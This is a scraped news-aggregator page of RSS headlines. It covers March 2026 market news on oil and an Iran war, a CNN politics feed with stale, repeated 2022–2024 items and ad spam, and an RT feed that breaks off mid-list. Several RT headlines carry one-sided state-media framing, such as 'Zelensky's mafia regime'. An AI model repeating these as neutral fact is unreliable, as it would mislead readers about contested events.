Oracle stock price target cut at Barclays on margin pressure

Article link

Date of publish: 2026-03-09 12:59:56

Barclays upgrades ACS on data centre platform valuation gap

Article link

Date of publish: 2026-03-09 12:54:58

UBS warns energy shock may cloud UK outlook despite steady Spring Statement

Article link

Date of publish: 2026-03-09 12:50:11

BofA upgrades Temenos to “buy,” sees upside as shares trade below historical valua

Article link

Date of publish: 2026-03-09 12:47:53

Apple 2H26 estimates cut at Citi on memory price hikes

Article link

Date of publish: 2026-03-09 12:33:25

Barclays sees UK rate cut on knife edge amid Middle East tensions

Article link

Date of publish: 2026-03-09 12:24:13

Oil prices could correct down just as hard as they spiked, Piper warns

Article link

Date of publish: 2026-03-09 12:19:36

Oracle denies reports of Abilene data center troubles

Article link

Date of publish: 2026-03-09 12:08:55

Oil could surge ’well above’ $130 if Hormuz flows stay depressed: Morgan Stanley

Article link

Date of publish: 2026-03-09 12:03:40

European gas surges 15% as Middle East war disrupts LNG supplies

Article link

Date of publish: 2026-03-09 12:02:21

uniQure stock surges 36% on FDA official’s departure

Article link

Date of publish: 2026-03-09 11:53:27

Berenberg initiates Vanquis with buy rating on credit growth

Article link

Date of publish: 2026-03-09 11:48:08

GBP resilience puzzles markets amid geopolitical turmoil

Article link

Date of publish: 2026-03-09 11:44:09

UBS says Middle East war complicates ECB policy outlook

Article link

Date of publish: 2026-03-09 11:42:31

Hims & Hers shares soar premarket; Pfizer, Agilent Technologies slip

Article link

Date of publish: 2026-03-09 11:39:17

South Korea’s KOSPI slides nearly 6% amid escalating Iran conflict

Article link

Date of publish: 2026-03-09 11:30:59

Dow Jones, Nasdaq, S&P 500 weekly preview: Iran war remains key focus, CPI on tap

Article link

Date of publish: 2026-03-09 11:30:48

Can the Fed look through an oil shock?

Article link

Date of publish: 2026-03-09 11:28:20

BofA warns AI threatens software sector as Anthropic ARR doubles to $19 bln

Article link

Date of publish: 2026-03-09 11:18:11

Morgan Stanley reshuffles EU sectors, downgrades software and lifts energy

Article link

Date of publish: 2026-03-09 10:48:10

JPM’s Matejka warns ’things might need to get worse before they can get better’

Article link

Date of publish: 2026-03-09 10:46:41

Morgan Stanley cuts UAE and Egypt view, upgrades Saudi Arabia on energy upside

Article link

Date of publish: 2026-03-09 10:42:41

S&P 500: Morgan Stanley says ’we’re closer to the end of this rolling correction’

Article link

Date of publish: 2026-03-09 10:31:57

Five things to watch in markets in the week ahead

Article link

Date of publish: 2026-03-09 10:28:23

Futures slide as Iran conflict fuels oil shock fears - what’s moving markets

Article link

Date of publish: 2026-03-09 10:24:02

Ipsen shares drop 3% after pulling Tazverik over blood cancer risk

Article link

Date of publish: 2026-03-09 10:16:24

UK PM says in talks with partners to limit economic impact of Iran crisis

Article link

Date of publish: 2026-03-09 10:04:10

Will the S&P 500 recover quickly from geopolitical shocks? Goldman weighs in

Article link

Date of publish: 2026-03-09 09:51:53

European airline stocks fall as oil spike raises fuel cost concerns

Article link

Date of publish: 2026-03-09 09:45:47

Are Middle East tensions changing the Bank of England rate outlook? UBS weighs in

Article link

Date of publish: 2026-03-09 09:44:09

JPMorgan turns bearish on EMEA mining, steel stocks on Middle East conflict risks

Article link

Date of publish: 2026-03-09 09:27:30

Roche shares drop 5% as breast cancer drug giredestrant fails clinical trial

Article link

Date of publish: 2026-03-09 09:18:16

European stocks slip as oil prices spike amid ongoing Iran conflict

Article link

Date of publish: 2026-03-09 09:15:29

Yardeni raises meltdown odds as Polymarket now sees 37% U.S. recession risk

Article link

Date of publish: 2026-03-09 09:10:50

Hims soars 44% on report Novo Nordisk to sell weight-loss drugs on its platform

Article link

Date of publish: 2026-03-09 09:04:33

UBS down after warning Swiss rules may require $22 bln in Capital

Article link

Date of publish: 2026-03-09 08:45:48

This part of the market looks ’very vulnerable’ to a deeper pullback: strategist

Article link

Date of publish: 2026-03-09 08:36:44

GEA Group shares fall as restructuring charges cloud profit beat

Article link

Date of publish: 2026-03-09 08:15:39

JPM warns Mideast crisis could hurt UAE markets, prefers Saudi stocks

Article link

Date of publish: 2026-03-09 08:06:24

UK ad and marketing firm M&C Saatchi’s CEO steps down

Article link

Date of publish: 2026-03-09 07:44:09

Barclays upgrades four EU airlines, sees jet fuel falling as Iran war eases

Article link

Date of publish: 2026-03-09 07:42:04

Can euro zone growth withstand the energy shock? Barclays weighs risks

Article link

Date of publish: 2026-03-09 07:11:30

Saudi Aramco offers spot crude as war disrupts oil flows, Bloomberg reports

Article link

Date of publish: 2026-03-09 06:57:15

Tencent has reportedly begun internal testing of QClaw

Article link

Date of publish: 2026-03-09 06:36:01

IMF’s Georgieva says Middle East conflict poses upside risks to inflation

Article link

Date of publish: 2026-03-09 06:18:01

G7 finance ministers to discuss joint oil reserve release - report 

Article link

Date of publish: 2026-03-09 06:02:07

Jefferies cuts Ferrovial to “hold;” says valuation rich after strong run

Article link

Date of publish: 2026-03-09 05:47:05

Live Nation nears DOJ settlement without Ticketmaster sale- Bloomberg

Article link

Date of publish: 2026-03-09 04:56:40

China less sensitive to Iran oil shocks than Asian peers- OCBC

Article link

Date of publish: 2026-03-09 03:17:29

Asia stocks plummet as oil surges further on deepening Middle East war

Article link

Date of publish: 2026-03-09 02:45:25

China CPI inflation hits 3-yr high in Feb on holiday boost, PPI shrinks again

Article link

Date of publish: 2026-03-09 01:46:06

KKR explores multibillion-dollar sale of data centre cooling firm CoolIT - FT

Article link

Date of publish: 2026-03-09 01:21:34

Nvidia taps Samsung, SK Hynix as exclusive HBM4 suppliers for Vera Rubin - report

Article link

Date of publish: 2026-03-09 00:59:55

Starboard takes large stake in frozen food maker Lamb Weston- WSJ

Article link

Date of publish: 2026-03-09 00:34:40

Iran names Mojtaba Khamenei as new supreme leader, state media reports

Article link

Date of publish: 2026-03-08 21:25:40

Could AI-powered property management transform hotel stays?

Article link

Date of publish: 2026-03-08 20:00:24

Nvidia GTC: Investors will focus on these 6 things

Article link

Date of publish: 2026-03-08 18:49:08

Day 8: Iran hits Gulf infrastructure as US, Israel strike Tehran fuel sites

Article link

Date of publish: 2026-03-08 18:33:28

Aramco shares jump as Iran war fuels oil supply concerns

Article link

Date of publish: 2026-03-08 18:19:15

BTIG’s Krinsky flags a ’buyable’ level in S&P 500

Article link

Date of publish: 2026-03-08 18:19:07

US energy chief says oil rally reflects ‘fear premium’, will fade

Article link

Date of publish: 2026-03-08 18:18:48

UBS sees rising opportunity for analog semis in AI data center power

Article link

Date of publish: 2026-03-08 18:00:02

US weighs special forces mission to seize Iran uranium, Bloomberg reports

Article link

Date of publish: 2026-03-08 17:27:54

Apple pushes budget devices to expand ecosystem, Bernstein says

Article link

Date of publish: 2026-03-08 16:00:02

Can U.S. LNG come to Europe’s rescue?

Article link

Date of publish: 2026-03-08 14:30:02

Which stocks are set to benefit the most from the FIFA 2026 World Cup?

Article link

Date of publish: 2026-03-08 13:30:01

Iraq oil output plunges about 60% as Iran war blocks tankers, Bloomberg reports

Article link

Date of publish: 2026-03-08 12:48:17

Apple: What are the risks and opportunities amid AI transition

Article link

Date of publish: 2026-03-08 12:17:05

Here are the key points from the ASML annual report

Article link

Date of publish: 2026-03-08 11:19:49

Iran war: How long could it last? Morgan Stanley weighs in

Article link

Date of publish: 2026-03-08 10:59:15

Politics RSS

Political sites below.

CNN.com - RSS Channel - Politics

How Kyrsten Sinema's decision makes Democrats' 2024 Senate map tighter

Arizona Sen. Kyrsten Sinema decided to shake up the political world on Friday by becoming an independent. The former Democrat is still caucusing with the party in the Senate, so the Democratic caucus still has 51 members. Now, instead of 49 Democrats and two independents within their ranks, the caucus has 48 Democrats and three independents.

Article link

Date of publish: Sat, 10 Dec 2022 17:24:17 GMT

Meet the woman steering Biden's bipartisan winning streak on Capitol Hill

The Biden administration managed to rack up a long list of major legislative wins in its first two years despite facing one of the most closely-divided Congresses in history. From bipartisan action on infrastructure, gun safety and same-sex marriage to party-line bills tackling climate change and expanding health care coverage, it's a record President Joe Biden and Democrats on the ballot were all eager to tout on the campaign trail during the midterms.

Article link

Date of publish: Sun, 11 Dec 2022 16:16:48 GMT

CNN Political Briefing

The political news you need to know, in 10 minutes or less. Hosted by David Chalian.

Article link

RT - Daily news

UN pulls out from border posts between African states

Preview UNISFA has withdrawn peacekeepers along the Sudan–South Sudan frontier, citing worsening security
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 10:29:05 +0000

Ukrainian draft dodger makes mountain escape in plane (PHOTOS)

Preview A 31-year-old Ukrainian is facing charges in Romania after crossing the border in a small aircraft to escape the draft
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 09:51:17 +0000

India takes emergency gas supply measures

Preview India has also directed refineries to boost production as the Middle East conflict disrupted supplies through the Strait of Hormuz
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 09:36:52 +0000

CNN.com - RSS Channel - Politics

How Kyrsten Sinema's decision makes Democrats' 2024 Senate map tighter

Arizona Sen. Kyrsten Sinema decided to shake up the political world on Friday by becoming an independent. The former Democrat is still caucusing with the party in the Senate, so the Democratic caucus still has 51 members. Now, instead of 49 Democrats and two independents within their ranks, the caucus has 48 Democrats and three independents.

Article link

Date of publish: Sat, 10 Dec 2022 17:24:17 GMT

Meet the woman steering Biden's bipartisan winning streak on Capitol Hill

The Biden administration managed to rack up a long list of major legislative wins in its first two years despite facing one of the most closely-divided Congresses in history. From bipartisan action on infrastructure, gun safety and same-sex marriage to party-line bills tackling climate change and expanding health care coverage, it's a record President Joe Biden and Democrats on the ballot were all eager to tout on the campaign trail during the midterms.

Article link

Date of publish: Sun, 11 Dec 2022 16:16:48 GMT

CNN Political Briefing

The political news you need to know, in 10 minutes or less. Hosted by David Chalian.

Article link

The Axe Files with David Axelrod

Go beyond the soundbites and get to know some of the most interesting players in politics.

Article link

Margins of Error

Look closely at almost anything and you'll find data—lots of it. But what are those numbers really saying about who we are and what we believe? Harry Enten is on a mission to find out.

Article link

The notable legal clouds that continue to hang over Donald Trump

All eyes are on former President Donald Trump, who has launched another White House bid.

Article link

Date of publish: Thu, 08 Dec 2022 03:36:24 GMT

The fine print of the Respect for Marriage Act

Let's start with the positive: Republicans and Democrats are coming together to protect same-sex marriage from the Supreme Court.

Article link

Date of publish: Tue, 29 Nov 2022 23:32:13 GMT

Everything you need to know about Biden's student loan forgiveness program

President Joe Biden's federal student loan forgiveness program, which promises to deliver up to $20,000 of debt relief for millions of borrowers, is on hold indefinitely as legal challenges work their way through the courts.

Article link

Date of publish: Tue, 13 Jun 2023 20:58:58 GMT

Politics of the Day

Politics of the Day

Article link

Date of publish: Fri, 14 Jun 2024 04:13:26 GMT

0% intro APR until 2024 is 100% insane
It's official: now avoid credit card interest into 2024
Experts: this is the best cash back card of 2022
Turn Your Rising Home Equity Into Cash You Can Use
Dream Big with a Home Equity Loan
Want Cash Out of Your Home? Here Are Your Best Options
Use the Right Card for Holiday Gifts (Save Hundreds on Interest)
10 Cards Charging 0% Interest Until 2024
Get a $200 Cash Back Bonus on Holiday Gift Buying
Array

Vice President Kamala Harris, a former US senator from California who previously served as the state's attorney general, could be the first Black woman and Asian American to lead a major party ticket after receiving President Joe Biden's support to become the next Democratic presidential nominee.

Article link

Array

Fareed explains why AI's massive energy demands are straining the power grid, but also why AI could enable big breakthroughs in sustainability and clean energy.

Article link

Array

In the wake of the Republican National Convention earlier this month, Fareed speaks with historian Niall Ferguson about how and why the modern-day GOP has changed since the Reagan era of the 1980s.

Article link

Array

Fareed speaks with New York Times opinion columnist Ezra Klein about the significance of Vice President Kamala Harris' early career as a prosecutor — and how it may affect her campaign.

Article link

Array

New York Times opinion columnist Ezra Klein speaks with Fareed about the effects of President Joe Biden's decision to not seek reelection — and whether Vice President Kamala Harris can reshape the race.

Article link

Array

CNN Senior Political Commentator Scott Jennings and Political Commentators Kristen Soltis Anderson, Jamal Simmons and Kate Bedingfield tell CNN's Jake Tapper who they think should join Vice President Kamala Harris' ticket and with 100 days until election day, the state of the 2024 presidential race.

Article link

Array

On CNN's State of the Union, Republican Sen. Tom Cotton criticizes Harris' comments on the war in Gaza and calls her a "San Francisco liberal who cannot keep this country safe."

Article link

Array

Years before he became president, many Americans first met Barack Obama during the 2004 Democratic National Convention.

Article link

Array

Joe Biden, the 46th president of the United States, announced on Sunday, July 21, that he is not seeking reelection.

Article link

Array

Fareed is joined by Jane Gilbert, chief heat officer for Miami-Dade County, Fla., who discusses how she is working to combat the effects of record high temperatures in a county that is considered ground zero for the climate crisis in the United States.

Article link

Array

Fareed speaks with David Frum, staff writer at The Atlantic, about how Sen. JD Vance went from being a fierce critic of Donald Trump to becoming the former president's running mate.

Article link

Array

Colorado Gov. Jared Polis tells CNN's Jake Tapper that Biden needs to show Democrats that he can turn his campaign around and says "he hasn't done that yet."

Article link

RT - Daily news

UN pulls out from border posts between African states

Preview UNISFA has withdrawn peacekeepers along the Sudan–South Sudan frontier, citing worsening security
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 10:29:05 +0000

Ukrainian draft dodger makes mountain escape in plane (PHOTOS)

Preview A 31-year-old Ukrainian is facing charges in Romania after crossing the border in a small aircraft to escape the draft
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 09:51:17 +0000

India takes emergency gas supply measures

Preview India has also directed refineries to boost production as the Middle East conflict disrupted supplies through the Strait of Hormuz
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 09:36:52 +0000

Madagascar president dissolves government

Preview Madagascar’s prime minister, Herintsalama Rajaonarivelo, and his government have been dismissed
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 09:14:02 +0000

Why Zelensky should fear Trump’s war with Iran

Preview The outcome could redefine US dominance – and leave Europe and Ukraine scrambling
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 08:14:18 +0000

Moscow condemns Israeli strike on Russian cultural center

Preview Russian humanitarian agency Rossotrudnichestvo has condemned an Israeli strike on its cultural partner in Lebanon
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 08:04:29 +0000

Dozens reportedly killed in Tehran as Trump threatens Iran with more ‘death’ (VIDEOS)

Preview RT brings you live updates on the US-Israeli war against Iran, as Tehran launches retaliatory strikes across the Middle East
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 07:09:21 +0000

Indonesia inks BrahMos missile deal with India – Reuters

Preview Indonesia has said the deal with India to buy BrahMos missiles is part of its defense modernization efforts
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 06:46:36 +0000

Trump suggests Iran struck girls’ school with US Tomahawk

Preview The US president has said Iran could have conducted the deadly strike on a girls’ school in Minab using a Tomahawk cruise missile
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 04:18:08 +0000

Anthropic sues Pentagon over killer AI rift

Preview AI developer Anthropic has challenged the decision to designate the company a “supply-chain risk to national security”
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 01:34:14 +0000

China prioritizes Russian gas amid Middle East conflict – media

Preview China has signaled its intention to secure more natural gas from Russia in the draft version of its development blueprint for 2026–2030
Read Full Article at RT.com

Article link

Date of publish: Tue, 10 Mar 2026 00:32:57 +0000

Germany reports industrial production decline

Preview German industries are showing no signs of recovery as of early 2026, according to the Federal Statistical Office (Destatis)
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 23:37:49 +0000

Will the war with Iran make Russia richer?

Preview Moscow stands to gain in the short-term from rising oil prices and disruption in the Persian Gulf
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 22:22:37 +0000

Putin and Trump hold phone call – Kremlin aide

Preview Presidents Vladimir Putin and Donald Trump have discussed the Ukraine and Iran conflicts in a phone call, Kremlin aide Yury Ushakov has said
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 19:35:04 +0000

EU reveals total spent on Ukraine

Preview The EU has given Ukraine €195 billion since 2022 and plans to give another €90 billion in a controversial loan, Kaja Kallas has said
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 19:23:55 +0000

Right-wing AfD makes historic gains in west German election

Preview The right-wing Alternative for Germany (AfD) party has received record support at the regional vote in the state of Baden-Wurttemberg
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 19:22:23 +0000

RT examines the history of US strikes on civilians after Iranian school attack (VIDEO)

Preview RT explores Washington’s reaction to its past strikes on civilian sites, after a bombing killed more than 160 children in Iran
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 16:43:13 +0000

Gulf oil production could stop in weeks – Putin

Preview The US and Israel’s conflict with Iran could lead to a halt in Gulf oil production, Russian President Vladimir Putin has said
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 16:27:43 +0000

The Iran war has triggered a puzzling market trend

Preview Gold is being sold to meet margin calls amid the market turbulence
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 15:57:03 +0000

US seeks control over the world – Khamenei’s representative in India

Preview Washington thinks it has the right to kill, just as Western colonizers did, Abdul Majid Hakim Elahi has told RT India
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 15:41:10 +0000

EU chief avoids condemning US-Israeli war on Iran

Preview Ursula von der Leyen has avoided condemning the US-Israeli war on Iran, saying “there should be no tears shed” for the slain supreme leader
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 15:32:45 +0000

Hungary urges EU to lift Russian oil ban

Preview Hungarian FM Peter Szijjarto says the EU should drop the sanctions on Russian oil to protect Europeans amid the Middle East crisis
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 15:04:39 +0000

Russia wins first Paralympic gold of 2026

Preview Skier Varvara Voronchikhina won the Super-G as Russia returned to the Paralympics under its national flag for the first time in ten years
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 15:04:25 +0000

Middle East conflict is of ‘particular concern’ to India – Jaishankar 

Preview  The region is vital to New Delhi’s energy security, its foreign minister has said.
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 12:27:07 +0000

Iran war exposes EU blunder in sanctioning Russia – Putin envoy

Preview The Iran war and rising oil prices show that the EU made a mistake by sanctioning Russian energy, Kirill Dmitriev has said
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 11:17:42 +0000

Six-year-old killed by Ukrainian strike on Russian region – authorities

Preview Ukrainian air strike on the Donetsk People’s Republic left four people dead and twelve injured, according to Denis Pushilin
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 11:15:44 +0000

US defends Russian oil sanctions waiver for India

Preview India has said it does not need permission from the US to buy Russian oil, as it continues imports from Russia
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 10:34:23 +0000

US Tomahawk missile filmed hitting near Iranian girls’ school – media (VIDEO)

Preview A Tomahawk missile likely landed near the Minab school, where more than 160 people were reportedly killed, according to media reports
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 09:05:53 +0000

IDF threatens to kill Iran’s new leadership

Preview The IDF says it will target Ayatollah Ali Khamenei’s successors amid the ongoing war in the Middle East
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 04:18:02 +0000

Oil for over $100 a barrel ‘very small price to pay’ for Iran war – Trump

Preview The spike in oil prices will not deter America in its war against Iran, US President Donald Trump has said
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 04:00:10 +0000

US will ‘make a ton of money’ from Iran war – senator

Preview Republican Senator Lindsey Graham says the Iran war will allow the US to control most of the oil production in the Middle East
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 01:49:56 +0000

Blast outside US Embassy in Oslo investigated as possible terrorist attack

Preview Norwegian police are investigating an explosion outside the US Embassy in Oslo as a possible act of terrorism
Read Full Article at RT.com

Article link

Date of publish: Mon, 09 Mar 2026 00:20:35 +0000

Mojtaba Khamenei named Iran’s next supreme leader

Preview Mojtaba Khamenei, the son of Ayatollah Ali Khamenei, has been selected as Iran’s new supreme leader
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 21:19:10 +0000

Kurds don’t trust US to back them against Iran – Axios

Preview Iraq’s Kurds are keeping out of the US-Israeli conflict against Iran, and are reportedly concerned about facing Tehran’s retaliation alone
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 17:18:42 +0000

Another EU country ready to veto Ukraine loan

Preview Slovakia is ready to block an EU loan for Kiev if Hungary’s Viktor Orban loses the upcoming election, Robert Fico has said
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 16:33:17 +0000

In a sane world, Zelensky’s mafia regime would be isolated

Preview Hungary and Slovakia are only EU nations standing up to the Kiev Godfather and thus the only one truly representing the Europeans’ interests
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 16:29:22 +0000

Iran picks Khamenei’s successor – who were the candidates?

Preview Several candidates loom large as Iran poised to pick Ali Khamenei’s successor
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 15:45:34 +0000

Iran deploys Lego VIDEO in PR war against US

Preview Iranian media have shared a Lego video hinting that Donald Trump struck the country in order to distract the public from the Epstein scandal
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 15:21:12 +0000

The powerful women of the West have betrayed feminism

Preview Instead of challenging male power, the high-ranking ladies attach themselves to it like tradwives
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 14:31:23 +0000

‘Wagging the dog’: Putin mocks EU-Ukraine relationship

Preview Brussels allows Kiev to blackmail EU members, Vladimir Putin has said, commenting on the halt of oil transit via Druzhba by Ukraine
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 14:01:44 +0000

Hungary and Ukraine clash over ‘war mafia’ cash convoy: What we know so far

Preview Hungary has impounded Ukrainian trucks carrying tens of millions of dollars in a money laundering probe
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 13:52:48 +0000

Russian Orthodox Church parishioners killed in Nigeria

Preview Terrorists attacked a village in the Nigerian state of Benue, killing and wounding parishioners, the Russian Orthodox Church said
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 12:16:05 +0000

Did you know Africa once had nuclear weapons?

Preview While Africa is legally committed to being a nuclear-free zone, its security is challenged by the lack of clarity in global nuclear politics
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 09:41:11 +0000

Sweden seizes cargo ship with ten Russians on board

Preview The Swedish Minister of Civil Defense has accused the vessel of being part of an alleged ‘shadow fleet’
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 09:24:48 +0000

Hungary refusing to return ‘war mafia’ cash to Ukraine (VIDEO)

Preview Ukraine’s state-owned bank has demanded that Hungary return the cash and gold bars seized during a police raid on an armored truck convoy
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 04:25:37 +0000

Former wrestler, border hawk: Who is Markwayne Mullin, Trump’s new Homeland Security pick?

Preview RT examines US President Donald Trump’s pick for the new head of the Department of Homeland Security
Read Full Article at RT.com

Article link

Date of publish: Sun, 08 Mar 2026 02:46:06 +0000

Trump claims Iran bombed its own school in Minab strike

Preview President Donald Trump has denied that the US forces struck an Iranian school, killing 175 students and teachers
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 23:25:20 +0000

Xi sends warning to ‘corrupt elements’ in Chinese army

Preview Chinese President Xi Jinping has vowed to weed out corruption in the military
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 22:21:55 +0000

India says it doesn’t need US permission to buy Russian oil

Preview India will continue to purchase Russian oil regardless of external pressure, New Delhi has said
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 21:10:34 +0000

The Iran war risks sucking in more countries – who benefits?

Preview What the US and Israel likely envisioned as a short and decisive war on Iran could spill over other borders – perhaps not accidentally
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 20:29:31 +0000

Prof. Schlevogt’s Compass No. 44: Dollar dominance and its discontents – Decoding US tariff populism

Preview The greatest threat to dollar primacy is not foreign rivals but domestic populists, fighting the wrong battle with the wrong weapons
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 18:54:01 +0000

German media giant buys UK’s top conservative newspaper

Preview German media powerhouse Axel Springer SE has moved to buy Tory party-affiliated British newspaper The Telegraph
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 18:37:09 +0000

Sports fans applaud Olympic return of Russian and Belarusian athletes (VIDEO)

Preview Italians erupt in applause for Russian and Belarusian athletes competing in Winter Paralympics 2026
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 18:02:28 +0000

US formally recognizes Venezuelan government – Trump

Preview US President Donald Trump has said that Washington recognizes the Venezuelan government of interim President Delcy Rodriguez
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 17:40:43 +0000

Russia wins first Winter Paralympic medals in 12 years

Preview Russian athletes have taken their first medals in the Winter Paralympic Games since 2014
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 17:35:17 +0000

EU rebukes Zelensky over threat to Orban

Preview Zelensky’s veiled threat against Viktor Orban is “not acceptable,” the European Commission deputy chief spokesperson says
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 14:29:07 +0000

US ‘unsanctions’ Russian oil amid Middle East crisis

Preview “Unsanctioning” Russian oil may cool the market after the US-Israeli attack on Iran sent global crude prices soaring
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 12:48:36 +0000

Trump makes new threats against Iran

Preview US President Donald Trump has threatened that Iran “will be hit very hard” on Saturday
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 11:50:39 +0000

How has the US-Israeli war on Iran divided the West? 

Preview US President Donald Trump has chastised European NATO members who fail to back his war on Iran
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 10:36:40 +0000

US-Israel vs. Iran: How are the warring sides faring? (VIDEOS)

Preview RT explores the warfighting capabilities of the US-Israel tandem and Iran as the war in the Middle East enters its second week
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 10:34:57 +0000

Iranians gather for first Friday prayers since US-Israel war began (PHOTOS, VIDEO)

Preview Iran held its first Friday prayers since the death of Supreme Leader Ayatollah Khamenei
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 09:26:52 +0000

South Africa re-enlists dozens of retired detectives

Preview Former South African detectives have re-enlisted in Western Cape to strengthen investigations and combat growing crime
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 08:21:00 +0000

Iran will no longer attack neighboring countries – Pezeshkian

Preview President Masoud Pezeshkian says Iran will stop attacking neighboring countries
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 08:08:42 +0000

US approves emergency sale of heavy bombs to Israel

Preview The US has approved an emergency sale of munitions to Israel during its war with Iran
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 05:01:52 +0000

America’s Gulf war machine: What we know about the US military network in the Middle East

Preview
Read Full Article at RT.com

Article link

Date of publish: Sat, 07 Mar 2026 01:04:40 +0000

The end of Russia’s gas era

Preview Putin tells Russia’s energy sector: There’s no going back to EU
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 21:39:54 +0000

BBC Middle East editor’s ‘Israeli propaganda’ court case begins

Preview A BBC editor and avowed Mossad admirer is suing a UK journalist, seeking the retraction of a story accusing him of pro-Israel bias
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 21:05:52 +0000

Who will invade Iran for the US?

Preview If air power fails, Washington will need someone else’s army to invade Iran
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 18:49:24 +0000

How the Iran war is dividing Team Trump

Preview Donald Trump’s war on Iran has exposed division within his cabinet and a split in the MAGA movement
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 18:44:40 +0000

Oil price surges to highest since 2023

Preview Crude oil prices hit a two-and-a-half year high on Friday amid supply disruptions in the Middle East due to the US-Israeli war against Iran
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 18:27:56 +0000

Western energy pressure on Russia has backfired – Kremlin envoy

Preview Western energy pressure on Russia has failed, Kirill Dmitriev has said, noting those who retained ties with Moscow made a “wise choice”
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 17:33:56 +0000

Sri Lanka takes custody of second Iranian ship after rescuing crew

Preview Sri Lankan President Anura Kumara Dissanayake said the nation is neutral in the US-Israeli war on Iran, but that humanity must prevail
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 16:54:03 +0000

No justification for US-Israeli war on Iran – Moscow

Preview Iran posed no threat to either the US or Israel, Russian Foreign Ministry spokeswoman Maria Zakharova has said
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 16:32:49 +0000

Trump demands ‘unconditional surrender’ from Iran

Preview The US is seeking only the “unconditional surrender” of Iran, President Donald Trump has announced
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 14:35:34 +0000

Moscow warns new NATO member against hosting nukes

Preview Finland’s plan to lift a ban on nuclear weapons transit would be viewed as a direct threat requiring a response, the Kremlin has said
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 14:17:43 +0000

Trump kicks Tucker Carlson out of MAGA

Preview US President Donald Trump has expelled Tucker Carlson from his MAGA movement over the commentator’s criticism of the Iran war
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 14:16:45 +0000

Ex-Indian foreign secretary slams US for attacking Iranian ship

